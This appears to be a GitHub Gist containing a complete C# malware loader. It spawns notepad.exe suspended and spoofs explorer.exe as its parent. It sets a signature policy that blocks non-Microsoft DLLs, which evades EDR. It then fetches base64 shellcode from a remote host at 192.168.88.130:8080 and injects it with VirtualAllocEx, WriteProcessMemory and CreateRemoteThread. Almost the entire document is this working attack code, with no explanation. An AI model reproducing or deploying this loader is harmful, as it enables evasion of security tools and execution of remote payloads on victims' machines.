Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;
public class Payload
{
public Payload()
{
var processInfo = CreateTargetProcess(@"C:\Windows\System32\notepad.exe");
var shellcode = GetShellcode("http://192.168.88.130:8080/shellcode.txt");
Inject(processInfo, shellcode);
}
public static Win32.PROCESS_INFORMATION CreateTargetProcess(string targetProcess)
{
var startInfoEx = new Win32.STARTUPINFOEX();
var processInfo = new Win32.PROCESS_INFORMATION();
startInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(startInfoEx);
var lpValue = Marshal.AllocHGlobal(IntPtr.Size);
try
{
var processSecurity = new Win32.SECURITY_ATTRIBUTES();
var threadSecurity = new Win32.SECURITY_ATTRIBUTES();
processSecurity.nLength = Marshal.SizeOf(processSecurity);
threadSecurity.nLength = Marshal.SizeOf(threadSecurity);
var lpSize = IntPtr.Zero;
Win32.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize);
startInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
Win32.InitializeProcThreadAttributeList(startInfoEx.lpAttributeList, 2, 0, ref lpSize);
// If we are x86 use this instead
// Marshal.WriteIntPtr(lpValue, new IntPtr(unchecked((uint)Win32.BinarySignaturePolicy.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE)));
Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.BinarySignaturePolicy.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE));
Win32.UpdateProcThreadAttribute(
startInfoEx.lpAttributeList,
0,
(IntPtr)Win32.ProcThreadAttribute.MITIGATION_POLICY,
lpValue,
(IntPtr)IntPtr.Size,
IntPtr.Zero,
IntPtr.Zero
);
var parentHandle = Process.GetProcessesByName("explorer")[0].Handle;
lpValue = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteIntPtr(lpValue, parentHandle);
Win32.UpdateProcThreadAttribute(
startInfoEx.lpAttributeList,
0,
(IntPtr)Win32.ProcThreadAttribute.PARENT_PROCESS,
lpValue,
(IntPtr)IntPtr.Size,
IntPtr.Zero,
IntPtr.Zero
);
Win32.CreateProcess(
targetProcess,
null,
ref processSecurity,
ref threadSecurity,
false,
Win32.CreationFlags.ExtendedStartupInfoPresent | Win32.CreationFlags.CreateSuspended,
IntPtr.Zero,
null,
ref startInfoEx,
out processInfo
);
}
catch (Exception e)
{
Console.Error.WriteLine(e.StackTrace);
}
finally
{
Win32.DeleteProcThreadAttributeList(startInfoEx.lpAttributeList);
Marshal.FreeHGlobal(startInfoEx.lpAttributeList);
Marshal.FreeHGlobal(lpValue);
Console.WriteLine("{0} started", processInfo.dwProcessId);
}
return processInfo;
}
public static void Inject(Win32.PROCESS_INFORMATION targetProcess, byte[] shellcode)
{
var allocatedRegion = Win32.VirtualAllocEx(targetProcess.hProcess, IntPtr.Zero, (uint)shellcode.Length, Win32.AllocationType.Commit | Win32.AllocationType.Reserve, Win32.MemoryProtection.ReadWrite);
UIntPtr bytesWritten;
Win32.WriteProcessMemory(targetProcess.hProcess, allocatedRegion, shellcode, (uint)shellcode.Length, out bytesWritten);
Win32.MemoryProtection oldProtect;
Win32.VirtualProtectEx(targetProcess.hProcess, allocatedRegion, (uint)shellcode.Length, Win32.MemoryProtection.ExecuteRead, out oldProtect);
Win32.CreateRemoteThread(targetProcess.hProcess, IntPtr.Zero, 0, allocatedRegion, IntPtr.Zero, 0, IntPtr.Zero);
}
public static byte[] GetShellcode(string url)
{
WebClient client = new WebClient();
client.Proxy = WebRequest.GetSystemWebProxy();
client.Proxy.Credentials = CredentialCache.DefaultCredentials;
string compressedEncodedShellcode = client.DownloadString(url);
return Convert.FromBase64String(compressedEncodedShellcode);
}
}
public class Win32
{
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);
[DllImport("kernel32.dll")]
public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList);
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, MemoryProtection flNewProtect, out MemoryProtection lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true, CallingConvention = CallingConvention.StdCall)]
public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
[StructLayout(LayoutKind.Sequential)]
public struct STARTUPINFO
{
public uint cb;
public IntPtr lpReserved;
public IntPtr lpDesktop;
public IntPtr lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttributes;
public uint dwFlags;
public ushort wShowWindow;
public ushort cbReserved;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdErr;
}
[StructLayout(LayoutKind.Sequential)]
public struct STARTUPINFOEX
{
public STARTUPINFO StartupInfo;
public IntPtr lpAttributeList;
}
[StructLayout(LayoutKind.Sequential)]
public struct SECURITY_ATTRIBUTES
{
public int nLength;
public IntPtr lpSecurityDescriptor;
public int bInheritHandle;
}
[Flags]
public enum ProcThreadAttribute : int
{
MITIGATION_POLICY = 0x20007,
PARENT_PROCESS = 0x00020000
}
[Flags]
public enum BinarySignaturePolicy : ulong
{
BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000,
BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE = 0x300000000000
}
[Flags]
public enum CreationFlags : uint
{
CreateSuspended = 0x00000004,
DetachedProcess = 0x00000008,
CreateNoWindow = 0x08000000,
ExtendedStartupInfoPresent = 0x00080000
}
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.